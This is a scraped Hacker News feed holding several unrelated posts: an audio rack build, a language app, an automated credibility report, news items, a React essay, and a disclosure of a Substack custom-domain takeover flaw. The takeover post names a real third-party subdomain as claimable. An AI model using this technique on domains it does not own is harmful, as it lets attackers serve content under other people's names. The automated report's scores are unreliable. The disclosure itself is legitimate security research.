    Panel metal

    I discovered a local company that could CNC turret punch the face plate for me. This manufacturing method was news to me; I had never heard of the process before.

    Trumpf CNC turret punch machine, similar to the one that made my parts
    Trumpf CNC turret punch machine, similar to the one that made my parts

    The workpiece is moved around, bolted to a gantry. There is a turret with a cassette of tools available. The CAM software optimises the selection and order of tools based on what’s to cut, picking (for instance) circular or curved punches for holes. The tools are pushed through the metal to shear out small chunks at a time.

    Because a specific tool is needed for each piece of geometry, it’s not possible to do certain holes or curves. That meant I was asked to adjust the panel holes a bit to suit what the machine had – only by around 0.5mm or so, it did not matter.

    The CAM tool selection was a big problem for me as the curves and holes that were produced by OpenSCAD were polygon approximations; the software at the workshop didn’t know how to associate tools for these shapes. I ended up using FreeCAD to infer circles by importing from OpenSCAD which is able to infer the proper shapes from the approximations.

    Since, I’ve discovered OpenSCAD-DFX-Fixup which claims to solve this problem. I haven’t tried it but I would check that out if you’re in the same situation.

    Due to the shearing process, there were quite a lot of apparent tooling marks and burrs. I started to file them off, but quickly discovered that sanding the plate with medium git sandpaper was much more effective and neater.

    Panel painting

    To paint the panels, instead of using rattle cans like I usually do, I thought I’d try a local auto paint shop. They gave me a good deal and put on some “2P” 2-part paint. The finish was flawless.

    Panel graphics

    I used a local company to do UV printing on the panel. I’ve had a great experience with UV printing at work – the finish is ultra durable and you’re able to print white too.

    I converted the text and graphics from openscad to SVG which the company accepted.

    I’ll admit I had go fever and didn’t put as much time as I should have into the graphics. I put simple text – it was sufficient but I could have made it look far better with some lines, logos etc.

    Switch boxes

    In addition to the brackets for the DAC and Pi/display, I made some boxes to house the mains on/off switches and the XLR/USB inputs.

    Speaker input/switch box
    Speaker input/switch box

    The general constriction method can be seen above – the front is attached via the socket bolts, the back via brass-inserts as described earlier. This worked really well to make the unit much more robust and hide the mess.

    The red device there is a 4 pole 2 position switch. It allows me to switch the inputs of the DSP unit from the DAC to my DJ controller which connects to the XLR inputs.

    HifiBerry and modifications

    I tried 2 HiFiberry hats, and settled on one with optical in and out. The optical out went to the DAC, and the input from the TV. That way, in theory I could get auto selection of TV vs Spotify and airplay.

    Pi/OLED/Dial bracket showing HifiBerry optical interface
    Pi/OLED/Dial bracket showing HifiBerry optical interface

    I connected the display and encoder with some dupont jump leads, intending to replace it with a custom ribbon cable at a later date. In the end I decided it was good enough as is.

    HiFiberry has some provision for a rotary encoder built in. However the code used was polling based which resulted in a terrible experience using the dial – it would skip a lot and was slow. It also missed presses sometimes too.

    To fix the rotary encoder issue I wrote some volume controller threaded python code to do this. I never got around to upstreaming this, so if you end up using it please do on my behalf.

    OLED test with starfield animation
    OLED test with starfield animation

    To test the OLED display tried some animations built into the luma OLED library I used. I never got round to implementing the track information display, just an indication of the current volume which was useful at least.

    Screen test animation to verify wiring and performance. OLED tech is so great!

    I have to say though, I was disappointed with the HiFiberry. In concept it’s great. However I ran into a lot of reliability issues when using it with airplay or as a spotify speaker; these things should just work, else they’re frustrating and worse than simply using a cable.5

    The volume control was also apparently linear instead of lograrithmic like it should be. This meant that the volume control was sensitive at low volumes and not sensitive enough at high volumes.


    1. An analogy: Home automation. Don’t replace a hard wired lightswitch which works 100% of the time with something “smart” that has dozens of single points of failure. More tech doesn’t mean it’s intrinsically better, it’s just bad engineering. ↩︎

    Putting it all together

    Thankfully everything fit together first time; albeit the large DAC bracket was tight. I think this could have been due to shrinkage, but more likely due to poor tolerances of my old 3D printer.

    Front of fully assembled unit
    Front of fully assembled unit

    Given there was nothing but the brackets to stop the 3mm aluminium from flexing, the assembly wasn’t as solid as I’d hoped for. Solid enough, though.

    I used blu-tack to prevent the DAC from moving out. Given it was positively retained from moving in by the face plate, this was fine. A good idea as it was easily removable.

    Installed with the spectrum analyser
    Installed with the spectrum analyser

    My eventual solution

    In the end I abandoned the HiFiBerry, DACMagic (and Driverack DSP) in favour of a Wiim Pro which is more reliable, and has a 12V trigger output which I wired straight to a beefy relay to turn on the power amps. This works great and is far more reliable.

    The new DSP resulted in undeniably better sound quality and the Wiim pro, while not perfect, is far more reliable.

    I kept the spectrum analyser though, as it’s rather interesting to associate bass notes with particular frequencies.

    Conclusion

    I have released the code to everything you see above in a github repository. It is supplied as-is without much documentation.

    It’s possible to rackmount nearly anything if you can sink it into a face panel somehow. It’s a great thing to do but high effort (and cost) the way I did it – a problem if you tend to change your gear around a lot like me.

    OpenSCAD is suited rather well to lay out the components, holes, support hardware and graphics all in one view. It is unfortunately not suited at all to a CNC turret punch simply because curves (arcs) are not properly represented in the DXF output – the machine therefore fails to find the right punch tool!

    Given my previous article I think I’d be better off 3D printing a rack conversion next time. The challenge would be to make it look just as solid and professional as the metal one – perhaps I could hide the necessary joins into the design and make the panel thicker to compensate.

    Given I now have a 3D printer able to print multiple colours, I could use a 0.2mm nozzle to embed (possibly backlit) graphics into the print itself. Alternatively I could use my laser cutter to vaporise a coating of paint to reveal the plastic colour underneath; there are may videos such as this one on Youtube that show how to do this.


    Thanks for reading! If you have comments or like this article, post or upvote it on Hacker news, Twitter, Hackaday, Lobste.rs, Reddit and/or LinkedIn.

    Please email me with any corrections or feedback.

    Tags:

    Related:


    ]]>
    https://calbryant.uk/blog/rackmounting-that-which-should-not-be-rackmounted/ hacker-news-small-sites-43230831 Sun, 02 Mar 2025 14:30:47 GMT
    <![CDATA[Learn Spanish from news (content adapts to your level)]]> thread link) | @dkaleta
    March 2, 2025 | https://my-topics.io/newsroom/turning-news-into-topics/ | archive.org

    At Topics, our mission is simple: we want intermediate language learners to dive into real content much earlier than they’d normally feel comfortable. We do this by adapting any given material to match your language level.

    Of all the possible resources out there (books, magazines, music, you name it), we’re focusing on stories and news right now.

    Why News?

    News is an awesome way to learn a language because it covers events and topics you already have some context for. Reading about familiar subjects makes it way easier to pick up new words and phrases—even when you’re encountering them in a different language.

    News in Topics v2

    We’ve given our news section a big upgrade in the newest version of Topics. Instead of browsing each news channel individually, you’ll now find a News Timeline right in the Topics tab. Just glance at the timeline and pick a story that piques your interest—simple as that!

    Our news channels run on top of public RSS feeds. That means we can pull in the latest stories and convert them into language lessons automatically.

    Got your own favorite RSS feed? We’ve added the option to add custom channels so you can bring in the news sources you love most. Once your feed is connected, we’ll convert those articles into lessons, too. You’ll see them listed in the same timeline, ready for you to learn from.

    We hope this makes tackling real-world news in your target language feel less intimidating and a whole lot more fun.

    ]]>
    https://my-topics.io/newsroom/turning-news-into-topics/ hacker-news-small-sites-43230824 Sun, 02 Mar 2025 14:29:33 GMT
    <![CDATA[Show HN: Hello, World – Introducing Soj.ooO]]> thread link) | @rasengan
    March 2, 2025 | https://soj.ooo/p/sojooo/post/f1563392ba0d6de4552ba2b9effabf90 | archive.org

    Unable to retrieve article]]>
    https://soj.ooo/p/sojooo/post/f1563392ba0d6de4552ba2b9effabf90 hacker-news-small-sites-43230558 Sun, 02 Mar 2025 14:00:43 GMT
    <![CDATA[My friend just built an app to spot fake news]]> thread link) | @johnnycasher
    March 2, 2025 | https://isitcap.com/report/does-college-turn-you-woke | archive.org

    52%

    IsItCap Score

    Truth Potential Meter

    Somewhat Credible

    Analysis Summary

    Verdict: Partially True

    Think this is old news?

    Based on our comprehensive analysis, the claim that college turns you woke is partially supported but largely nuanced. The mainstream sources suggest that colleges do promote political awareness and engagement, which could be interpreted as contributing to a more woke student body. However, conflicting sources argue that the stereotype of woke campuses is often exaggerated and based on misinformation.

    The evidence supporting this conclusion includes studies showing higher education enhances civic engagement and promotes political literacy, but these outcomes do not necessarily equate to wokeness as commonly perceived.

    In considering the broader context, the term woke is highly subjective and politicized, making it difficult to definitively conclude whether colleges turn students woke. Ultimately, while colleges do contribute to political awareness, the claim is more complex than a simple true or false.

    Category 1: Evidence & Source Integrity

    True/False Spectrum5.34 / 10

    Source Credibility & Track Record7.92 / 10

    Bias & Independence Assessment6.15 / 10

    Category 2: Claim & Contextual Analysis

    Contextual Integrity & Accuracy8.27 / 10

    Content Coherence & Logical Consistency8.49 / 10

    Expert & Consensus Alignment5.81 / 10

    Source Analysis

    Mainstream Sources

    Navigating Election Year Dynamics: The Impact on College Campuses

    Election years bring heightened political engagement to college campuses, fostering debates and civic participation. Colleges provide educational opportunities and support activism, promoting informed citizenship. However, this increased political activity can also lead to ideological tensions.

    • Increased political awareness and engagement
    • Promotion of civic learning and engagement
    • Challenges such as ideological tensions

    The Role of Universities in Fostering Political Awareness among Students

    Universities play a crucial role in fostering political awareness by providing diverse courses and activities, promoting student participation in political life. This cultivation of political awareness could be seen as contributing to a more 'woke' or politically conscious student body.

    • Universities encourage political participation and awareness
    • Courses and activities promote political literacy

    American Sociological Association

    Higher Education Experiences and Political Engagement

    Higher education is associated with increased civic engagement. Specific college experiences, like social sciences coursework and community projects, enhance political engagement, potentially leading to a more 'woke' or engaged citizenry.

    • Higher education correlates with civic engagement
    • Specific experiences enhance political participation

    Alternative Sources

    Does Higher Education Promote Wokeness?

    Some conservative viewpoints argue that higher education institutions are overly focused on promoting progressive ideologies, which they term as 'wokeness'. However, this perspective often aligns with political biases rather than empirical evidence.

    • Criticism of progressive ideologies in academia
    • Concerns about ideological imbalance

    The Myth of the 'Woke' Campus

    This article challenges the notion that colleges are overly 'woke', suggesting that such perceptions are exaggerated and often based on misinformation or stereotypes.

    • Critique of the 'woke campus' stereotype
    • Arguments against the idea of widespread 'wokeness'

    College Campuses Are Not as 'Woke' as You Think

    This article suggests that the idea of colleges being uniformly 'woke' is overstated, pointing to diversity of opinions and experiences on campuses.

    • Diversity of opinions on college campuses
    • Challenges to the stereotype of widespread 'wokeness'

    Analysis Breakdown

    True/False Spectrum (5.3)Source Credibility (7.9)Bias Assessment (6.2)Contextual Integrity (8.3)Content Coherence (8.5)Expert Consensus (5.8)70%

    Understanding the Grades

    Metrics

    • Verifiability: Evidence strength
    • Source Quality: Credibility assessment
    • Bias: Objectivity measure
    • Context: Completeness check

    Scale

    • 8-10: Excellent
    • 6-7: Good
    • 4-5: Fair
    • 1-3: Poor

    Detailed Analysis

    The term 'woke' is inherently subjective and carries various connotations depending on the ideological perspective of the individual using it. The original claim that 'college turns you woke' is nebulous and cannot be quantified with precision.

    The analysis provided uses a range of mainstream and conflicting sources that address the influence of higher education on students' political awareness. Some sources correlate higher education with increased political engagement and awareness, which could contribute to a perception of 'wokeness'.

    However, the concept of 'wokeness' itself is not rigorously defined in these studies, leading to ambiguity in the claim's assessment. Additionally, the conflicting sources suggest that the notion of uniformly 'woke' campuses might be overstated and influenced by biases or stereotypes.

    Key Points

    • Varying definitions of 'wokeness' lead to subjective interpretations.
    • Mainstream sources report on the correlation between higher education and political engagement.
    • Conflicting sources suggest that claims of uniformly 'woke' campuses are exaggerated.
    • Lack of empirical evidence to directly support the claim that college 'turns' students 'woke'.

    The selection of sources includes reputable educational and sociological publications as well as ideologically oriented media. Honors Society and Clausius Press are educational platforms that may carry institutional biases towards presenting higher education in a positive light.

    The American Sociological Association is a respected organization, but its publications can reflect the perspectives prevalent within the academic community. On the other end, The National Review and Politico are known to have conservative and liberal editorial slants, respectively.

    The Guardian is a mainstream media outlet with a reputation for progressive reporting. The evaluation of these sources should consider their potential institutional biases and narrative alignments.

    Key Points

    • American Sociological Association for its academic standing.
    • The National Review for representing a conservative viewpoint.
    • The Guardian and Politico for bringing mainstream media perspectives.

    The provided analysis demonstrates a spectrum of biases, from academic institutions potentially promoting their own value, to mainstream and ideologically driven media outlets presenting conflicting views on higher education's impact on students' political leanings. The term 'woke' itself is often used pejoratively by conservative outlets, while progressive sources may embrace or dismiss it based on context.

    This reflects a divide in how 'wokeness' is perceived and reported, with each side carrying potential financial motivations to cater to their respective audiences. The timing of narrative shifts, particularly around election years or cultural flashpoints, can also affect the framing of 'wokeness' in higher education.

    Key Points

    • Institutional bias from educational sources.
    • Ideological bias from media outlets.
    • Financial motivations to appeal to specific audiences.
    • Narrative shifts influenced by cultural or political events.

    The context surrounding the original claim is rich with historical and cultural layers. Higher education has a long history of being a battleground for political ideas and movements.

    The analysis touches upon this by acknowledging the role of colleges in fostering political engagement. However, it does not delve deeply into the historical patterns of student activism, the evolution of political discourse on campuses, or the power structures within academia that influence these dynamics.

    Additionally, the broad use of the term 'woke' lacks historical context, as its meaning has shifted over time and across different social landscapes.

    Key Points

    • Historical role of colleges in political movements.
    • Evolution of political discourse on college campuses.
    • Power structures within academia influencing political engagement.
    • The shifting meaning of 'woke' over time.

    The origin of the claim 'college turns you woke' likely stems from observations of student activism and the role of colleges in promoting social and political awareness. However, the analysis does not deeply investigate the flow of information through alternative networks or seek early mentions of the claim on deep web forums or in whistleblower testimonies.

    There is also a lack of examination of parallel historical patterns, such as the influence of past educational reforms on student political leanings, or the suppression of precursor events that may have led to the current framing of the claim.

    Key Points

    • Observations of student activism.
    • Colleges' role in promoting political awareness.
    • Lack of investigation into alternative networks.
    • Absence of historical pattern analysis.

    While the analysis does provide a variety of perspectives from different sources, it may not fully explore the deeper layers of alternative media, foreign language alternative sources, and blockchain-preserved information. There is potential for hidden angles such as the impact of international student movements on the American college political landscape, or the exploration of how deep web communities discuss the influence of academia on student ideology.

    The analysis could also benefit from an investigation into patterns of removed content that may have contained dissenting views or evidence counter to the prevailing narratives.

    Key Points

    • Impact of international student movements on U.S. campuses.
    • Discussions on deep web communities regarding academic influence.
    • Patterns of removed content with dissenting views or evidence.

    Understanding Your Report

    ]]>
    https://isitcap.com/report/does-college-turn-you-woke hacker-news-small-sites-43230515 Sun, 02 Mar 2025 13:56:26 GMT
    <![CDATA[Elon Musk backs US withdrawal from NATO alliance]]> thread link) | @dtquad
    March 2, 2025 | https://ukdefencejournal.org.uk/elon-musk-backs-us-withdrawal-from-nato-alliance/ | archive.org

    Elon Musk, a key figure in President Donald Trump’s administration and head of the United States Department of Government Efficiency, has backed calls for the United States to leave the North Atlantic Treaty Organisation (NATO).

    Musk voiced his support on X (formerly Twitter) on Saturday night when he responded “I agree” to a post stating, “It’s time to leave NATO and the UN.” His endorsement aligns with growing calls from some Republican lawmakers, including Senator Mike Lee, to reconsider the US commitment to the alliance.

    Lee, a long-time critic of NATO, has described it as a “Cold War relic” and argued that the alliance “has to come to a halt.” He claims NATO is a “great deal for Europe” but a “raw deal for America”, suggesting that US resources are being stretched to protect Europe while offering little direct benefit to American security.

    Musk’s comments come amid broader discussions within the Trump administration over the future of America’s role in NATO and international alliances.

    While Trump has not explicitly stated his intent to withdraw from NATO, he has repeatedly pressured European nations to increase their defence spending, warning that the US should not bear the financial burden of the alliance alone.

    As a key figure in the administration, Musk’s influence on Trump’s policy decisions is significant. His endorsement of a NATO withdrawal could signal growing momentum within the White House for a shift towards a more isolationist foreign policy, focusing on domestic defence priorities over international commitments.

    With the war in Ukraine ongoing and NATO playing a critical role in supplying military aid, any US withdrawal would drastically reshape the global security landscape. European leaders have already expressed concerns over Trump’s stance on NATO, particularly as the alliance works to counter Russian aggression and maintain stability in Eastern Europe.

    Despite Musk and Lee’s calls for withdrawal, Trump has continued to engage with NATO leaders, recently hosting UK Prime Minister Keir Starmer in Washington for discussions on European security. However, with Trump’s administration pushing for major shifts in US foreign policy, NATO’s future role in American defence strategy remains uncertain.

    ]]>
    https://ukdefencejournal.org.uk/elon-musk-backs-us-withdrawal-from-nato-alliance/ hacker-news-small-sites-43230324 Sun, 02 Mar 2025 13:31:26 GMT
    <![CDATA[Heima App: A Home Management App Built with Passion]]> thread link) | @danielkaldheim
    March 2, 2025 | https://kaldheim.org/posts/heima-home-management-app-built-with-passion/ | archive.org

    Unable to retrieve article]]>
    https://kaldheim.org/posts/heima-home-management-app-built-with-passion/ hacker-news-small-sites-43229769 Sun, 02 Mar 2025 12:26:03 GMT
    <![CDATA[YouTube Dominates Podcasting with over 1B Monthly Viewers]]> thread link) | @geox
    March 2, 2025 | https://digitalmarketreports.com/news/34875/youtube-dominates-podcasting-with-over-1-billion-monthly-viewers/ | archive.org

    YouTube Dominates Podcasting with Over 1 Billion Monthly Viewers

    YouTube announced on Wednesday that it has surpassed 1 billion monthly active podcast viewers, marking a significant milestone in the podcasting industry. The platform continues to assert its dominance, positioning itself as a formidable rival to Spotify, the other major player in this space. With the growing consumer preference for video-first formats, YouTube’s popularity underscores the shifting dynamics in how audiences consume podcast content.

    Changes to Mid-Roll Ads and Enhancing the Viewing Experience

    To further enhance user experience and support creators, YouTube plans to implement changes to its mid-roll ads starting May 12. These modifications will strategically place advertisements at natural break points, such as pauses and transitions within videos. This approach aims to improve the viewing experience while enabling creators to earn more revenue from their content. YouTube’s model of sharing billions in ad revenue with creators plays a crucial role in fostering a thriving ecosystem for content producers.

    In its quest to remain competitive, Spotify has increased its investment in video-first podcasting. In November 2024, Spotify began paying popular video hosts in an effort to attract both talent and users. This strategic move highlights Spotify’s commitment to embracing video content as a means to expand its reach and strengthen its position in the industry.

    The rise of YouTube in the podcasting arena is further evidenced by the staggering 400 million hours of podcast content watched on living room TVs last year. This figure reveals the growing trend of audiences favoring video platforms for consuming podcasts, aligning with the broader shift towards multimedia content consumption.

    As YouTube continues to innovate and expand its offerings, it remains a dominant force in the podcasting landscape. The platform’s commitment to enhancing user experience through changes like improved mid-roll ads reflects its dedication to maintaining its leadership position. Meanwhile, Spotify’s efforts to integrate video content demonstrate the evolving nature of competition in this dynamic industry.

    Author’s Opinion

    YouTube’s continued dominance in the podcasting industry, especially with its push towards video-first content, makes it clear that the platform’s evolution is in tune with audience preferences. While Spotify’s efforts are commendable, YouTube’s ability to leverage video formats in podcast consumption places it in a unique position for long-term leadership. As both platforms refine their strategies, the competition will only intensify, further benefiting consumers and creators alike.


    Featured image credit: FMT

    Follow us for more breaking news on DMR

    ]]>
    https://digitalmarketreports.com/news/34875/youtube-dominates-podcasting-with-over-1-billion-monthly-viewers/ hacker-news-small-sites-43229285 Sun, 02 Mar 2025 11:10:25 GMT
    <![CDATA[There's no such thing as an isomorphic layout effect]]> thread link) | @thunderbong
    March 2, 2025 | https://smoores.dev/post/no_such_thing_isomorphic_layout_effect/ | archive.org

    Feb. 22, 2025

    So, recently, React ProseMirror added support for server-side rendering. If you read my post about how React ProseMirror works, you may already know that React ProseMirror relies fairly heavily on React’s useLayoutEffect hook for reading data from the DOM after render. And if you’re familiar with server-side rendering, you may be familiar with what happens when you render a component that uses useLayoutEffect on the server:

    Warning: useLayoutEffect does nothing on the server, because its effect

    cannot be encoded into the server renderer's output format. This will

    lead to a mismatch between the initial, non-hydrated UI and the intended

    UI. To avoid this, useLayoutEffect should only be used in components

    that render exclusively on the client. See

    https://reactjs.org/link/uselayouteffect-ssr for common fixes.

    It’s worth breaking down what this warning is actually trying to communicate, because it’s not especially straightforward. To start, we should review what useLayoutEffect is actually for. Like other React hooks, useLayoutEffect provides a mechanism for managing side effects. In particular, as the name implies, layout effects are meant to be side effects that read from the DOM, usually for the purpose of modifying the layout of a component. To allow this, React will execute a component’s render function, commit the changes to the DOM, and then immediately run its layout effects before the browser paints those DOM updates. This means that something like a tooltip component can evaluate the position of its anchor in a layout effect, update its state to reflect that position, and be re-rendered with that new state, all without the user ever seeing the tooltip in the wrong place.

    Now let’s walk through what happens when we server-side render a component like this. Below, we have an example application that uses a layout effect to position a tooltip:

    import { useLayoutEffect } from "react";

    export function App() {

    const [tooltipTop, setTooltipTop] = useState(0);

    const [tooltipLeft, setTooltipLeft] = useState(0);

    const anchorRef = useRef<HTMLDivElement | null>(null);

    useLayoutEffect(() => {

    if (!anchorRef.current) return;

    const rect = anchorRef.current.getBoundingClientRect();

    setTooltipTop(rect.top);

    setTooltipLeft(rect.left);

    }, []);

    return (

    <article>

    <h1>Positioned Tooltip Demo</h1>

    <div ref={anchorRef} />

    <p>A tooltip should be positioned above this paragraph.</p>

    <div style={{ position: "absolute", top, left }}>This is the tooltip</div>

    </article>

    );

    }

    Because we’re using a layout effect, this component will actually be rendered twice on mount, with both renders occurring before the DOM has even been painted once. The result is that the tooltip will be correctly positioned on the very first paint, with the user only ever visually seeing a DOM represented by the following HTML:

    <article>

    <h1>Positioned Tooltip Demo</h1>

    <div></div>

    <p>A tooltip should be positioned above this paragraph.</p>

    <div style="position: absolute; top: 50px; left: 8px;"></div>

    </article>

    But what happens when we render this component on the server? There is no DOM on the server at all, so React never executes layout effects. Instead, the component is rendered exactly once, using the default values for our state:

    <article>

    <h1>Positioned Tooltip Demo</h1>

    <div></div>

    <p>A tooltip should be positioned above this paragraph.</p>

    <div style="position: absolute; top: 0; left: 0;"></div>

    This means that in a server-side rendered context, until the client-side JavaScript bundle is loaded, parsed, and executed, the user will be looking at the wrong UI. The tooltip will simply be in the wrong place (at 0, 0). It will look broken!

    This is precisely the issue that React was trying to warn us about. Because effect hooks don’t execute on the server at all, server-side rendered UIs that rely on them may appear broken until they’re hydrated on the client. Following the link from the warning message takes us to a GitHub Gist with two proposed solutions: replacing the useLayoutEffect with a useEffect, and conditionally rendering the component that uses useLayoutEffect only on the client. For our tooltip example, we should use the second option — it’s better to simply not render the tooltip at all until the client-side JavaScript has a chance to run and determine where it should be positioned.

    Not all layout effects actually need to modify the layout, though. React ProseMirror, for example, uses layout effects internally to maintain ProseMirror’s view descriptor tree, which is roughly analogous to React’s virtual DOM. Because this requires reading from the DOM, but not modifying it, it’s actually safe to include in a server-side rendered component. But it’s a huge pain to fill up users’ server logs with warnings about useLayoutEffect that they can’t (and don’t need to) do anything about!

    If you’ve been around the server-side rendering block once or twice, you can probably see where this is going. The use-isomorphic-layout-effect library, or other implementations of it available from other popular libraries, is often the first tool that developers reach for when they encounter this warning. Let’s take a look at its implementation:

    use-isomorphic-layout-effect/src/index.ts

    import { useEffect, useLayoutEffect } from 'react'

    import isClient from '#is-client'

    export default isClient ? useLayoutEffect : useEffect

    Very simple! The library only runs useLayoutEffect if the code is running on the client (in the browser, this determined via typeof document !== "undefined"). On the server, instead, it runs… useEffect, instead? That’s sort of odd. Effects never execute on the server — why would we bother running useEffect there?

    And it’s not just this library that’s made this somewhat odd choice of no-op. Here’s react-use’s implementation:

    const useIsomorphicLayoutEffect = isBrowser ? useLayoutEffect : useEffect;

    The Mantine design system:

    export const useIsomorphicEffect = typeof document !== 'undefined' ? useLayoutEffect : useEffect;

    React Beautiful DnD:

    const useIsomorphicLayoutEffect =

    typeof window !== 'undefined' &&

    typeof window.document !== 'undefined' &&

    typeof window.document.createElement !== 'undefined'

    ? useLayoutEffect

    : useEffect;

    In case it’s not clear why I’m so fascinated by this choice, here’s React ProseMirror’s implementation:

    import { useLayoutEffect } from "react";

    export function useClientLayoutEffect(

    ...args: Parameters<typeof useLayoutEffect>

    ) {

    if (typeof document === "undefined") return;

    useLayoutEffect(...args);

    }

    This implementation has precisely the same behavior as the implementations above. On the client, it calls useLayoutEffect, and on the server, it does nothing. I didn’t name it “isomorphic”, because it’s not really isomorphic — at least in the sense of “Isomorphic JavaScript”, which describes JavaScript code that runs on both the client and the server — as it doesn’t run on the server at all!

    Just to be clear, this doesn’t really matter. I’m not arguing that no one should ever use use-isomorphic-layout-effect, or that all of these libraries need to change their implementations of this function to use an explicit no-op instead of useEffect on the server. I am, however, curious about where this surprisingly ubiquitous quirk of the React ecosystem came from. And I have a hypothesis.

    In February of 2019, the React team released React 16.8, the first stable release of React that included hooks. Two months later, React Redux released their v7, which included a new hooks-based integration between React and Redux. And wouldn’t you know it:

    // React currently throws a warning when using useLayoutEffect on the server.

    // To get around it, we can conditionally useEffect on the server (no-op) and

    // useLayoutEffect in the browser. We need useLayoutEffect because we want

    // `connect` to perform sync updates to a ref to save the latest props after

    // a render is actually committed to the DOM.

    const useIsomorphicLayoutEffect =

    typeof window !== 'undefined' ? useLayoutEffect : useEffect

    ...

    // We need this to execute synchronously every time we re-render. However, React warns

    // about useLayoutEffect in SSR, so we try to detect environment and fall back to

    // just useEffect instead to avoid the warning, since neither will run anyway.

    useIsomorphicLayoutEffect(() => {

    Make sure to read those comments — the React Redux team seems fully aware that useEffect is a mere no-op here. React Beautiful DnD’s implementation actually directly references this React Redux code. Other implementations likely either copied from one of these two popular libraries, or from this Medium post from a few weeks later.

    From what I can tell, a very popular, well maintained library made an early, arbitrary implementation decision. Because copying this library felt like a safe bet to other library maintainers, this arbitrary decision became the de facto implementation for this workaround. A Medium post about this implementation became so widely read that it’s still the number one Google result for the query “useLayoutEffect ssr warning”, several slots above the GitHub Gist discussing the correct solution for most use cases.

    Even though I had an explanation, this kept itching at me. This is partly due to the description of the use-isomorphic-layout-effect library, which reads:

    A React helper hook for scheduling a layout effect with a fallback to a regular effect for environments where layout effects should not be used (such as server-side rendering).

    There is no mention here that useEffect is a mere no-op in those situations. It also seems to describe the problem space somewhat incorrectly — if a given layout effect actually should not be used in server-side rendering, then the component using it almost certainly should not be server-side rendered at all. Falling back to a plain effect in that situation is precisely as incorrect as using a layout effect — only without a warning to guide you toward the correct solution.

    react-use’s useIsomorphicLayoutEffect hook has a somewhat more accurate description:

    useLayoutEffect that does not show warning when server-side rendering, see Alex Reardon’s article for more info.

    But it also lacks any detail about when it’s appropriate to use this hook in place of useLayoutEffect. And, worse, on the main README for react-use, the description for the hook reads:

    useLayoutEffect that that [sic] works on server.

    Which is not correct. This hook, like all other “isomorphic” layout effect hooks, has exactly the same behavior as useLayoutEffect, minus the warning. It does not work on the server!

    I may be reading far too much into this very scant story, but I began to see a narrative unfold the further I looked into this:

    A maintainer for a very popular open source library, in the midst of a big refactor, made an essentially arbitrary decision to work around a noisy warning that wasn’t relevant to their use case. They seem to have done this with full knowledge that their decision was arbitrary, and left a comment explaining it.

    Another maintainer for a similarly popular open source library also needed to work around the warning, which was similarly irrelevant to their use case. They saw this workaround and decided to copy it as-is, leaving only link to the original (which has since been replaced) as explanation.

    A developer, frustrated by the warning, found these libraries’ workaround and authored a short blog post touting it as a way to quiet the warning. They seem to at least somewhat misunderstand the purpose of the warning (or maybe they fully understand it, but didn’t fully explain), and don’t clarify in their post that the choice of useEffect is essentially arbitrary.

    As more developers migrated to use React hooks, more developers ran into this warning and began searching for solutions. Some of them published the solution from Reardon’s blog post in their own libraries, and others found Reardon’s post and implemented his approach themselves.

    At each step in the saga, there’s less and less context. Even though the warning itself links to a GitHub Gist that explains the issue and solutions quite well, searching the language of the warning will retrieve Reardon’s post and other solutions before the linked Gist from the React team.

    As a result, the de facto solution to this “problem” doesn’t have sufficient context for users to understand how to use it effectively. The hugely popular React-Select library, for example, incorrectly uses use-isomorphic-layout-effect to position and scroll a menu, when it should instead avoid rendering the menu on the server at all. And I’m not trying to pick on React-Select — it seems likely that this is almost never an actual bug for them, since menus are likely always collapsed during the server render. But that is precisely the use case that the React team had in mind when they added the useLayoutEffect warning!

    To me at least, this is a reminder of why it’s important to understand why our code does what it does. It can be tempting to sit back and let sleeping dogs lie after finally finding the solution to a confounding bug. But it’s all too easy for those incomplete understandings to build up and slowly shift our intuition over time, until we find that our mental model of our problem space doesn’t match reality any longer.

    Oh, and React ProseMirror doesn’t trigger the layout effect warning during server-side rendering anymore!

    ]]>
    https://smoores.dev/post/no_such_thing_isomorphic_layout_effect/ hacker-news-small-sites-43229236 Sun, 02 Mar 2025 11:01:11 GMT
    <![CDATA[Substack Domain Takeover]]> thread link) | @joren485
    March 2, 2025 | https://blog.nietaanraken.nl/posts/substack-domain-takeover/ | archive.org

    Substack is a popular blogging platform. It allows writers to easily create their own personal blog, with payments, comments, analytics and other advanced features. Substack empowers writers to customize their blogs by adding a custom domain.

    In this blog, we will talk about an edge case that allows an attacker to take over inactive Substack blog custom domains.

    Introduction

    When you create a blog on substack, it will be available on the <username>.substack.com subdomain. If writers want their blog to look a bit more professional, they can add a custom domain. For example, instead of having your blog named https://michaelshellenberger.substack.com, you can use https://www.public.news/.

    To set up a custom domain on Substack, a customer needs to create a CNAME record pointing from their domain to target.substack-custom-domains.com1 and adding the domain to blog settings:

    Before a customer is allowed to use a custom domain, however, they first have to pay a one-time $50 fee.

    Behind the scenes, Substack uses Cloudflare for SaaS to manage most of the custom domain heavy lifting. Cloudflare for SaaS allows companies to easily route customer domains to company infrastructure. When a customer adds a custom domain to their Substack blog, Substack will add the domain to their Cloudflare for SaaS account and Cloudflare will route requests to the custom domain to Substack. Whenever someone visits the custom domain, the request is sent to Substack. Substack then matches the requested domain to a blog to serve to the visitor.

    The Edge Case

    Software that supports setting up a custom domain, is a great target for domain takeover attacks 2, a type of attack where an attacker is able to control the content that is served on a victim domain.

    When a customer wants to stop using a custom domain for a Substack blog (e.g. because they want to stop publishing the blog), they will have to manually remove the CNAME record. But what if someone forgets to remove the CNAME record?

    When a CNAME record exists for a custom domain and the domain is linked to a Substack blog, Substack will serve the blog without issue. However, if the CNAME record exists, but the domain is not linked to Substack blog, the domain will not be added to the Cloudflare for SaaS account of Substack and Cloudflare will not know where to route requests to the domain. This will result in an error from Cloudflare:

    A Cloudflare 1001 error for domains that are not managed by Cloudflare. A Cloudflare 1014 error for domains that are managed by Cloudflare.

    Taking over a subdomain

    You may have noticed that Substack does not actually authenticate that a domain is owned by a customer when the customer adds it to their blog. The domain just needs a CNAME record that points to target.substack-custom-domains.com.

    This means that if someone accidentally adds a CNAME record to their domain, but does not add it to a Substack blog, anyone can add the domain to a Substack blog (they will also have to pay the $50 fee).

    Let’s look at denver.therollup.co, a domain that I do not have any association with. It has the correct CNAME:

    $ drill denver.therollup.co
    ...
    ;; ANSWER SECTION:
    denver.therollup.co.	253	IN	CNAME	target.substack-custom-domains.com.
    target.substack-custom-domains.com.	21	IN	A	172.64.151.232
    target.substack-custom-domains.com.	21	IN	A	104.18.36.24
    ...
    

    But it is not actually added to a blog:

    This allows anyone to add the domain to their own Substack blog and serve any content they want:

    Wildcard domains

    The above attack only works on domains that are no longer active. However, if someone sets up a wildcard CNAME record (e.g. *.example.com has a CNAME to target.substack-custom-domains.com), every domain under the wildcard record is vulnerable to a domain takeover.

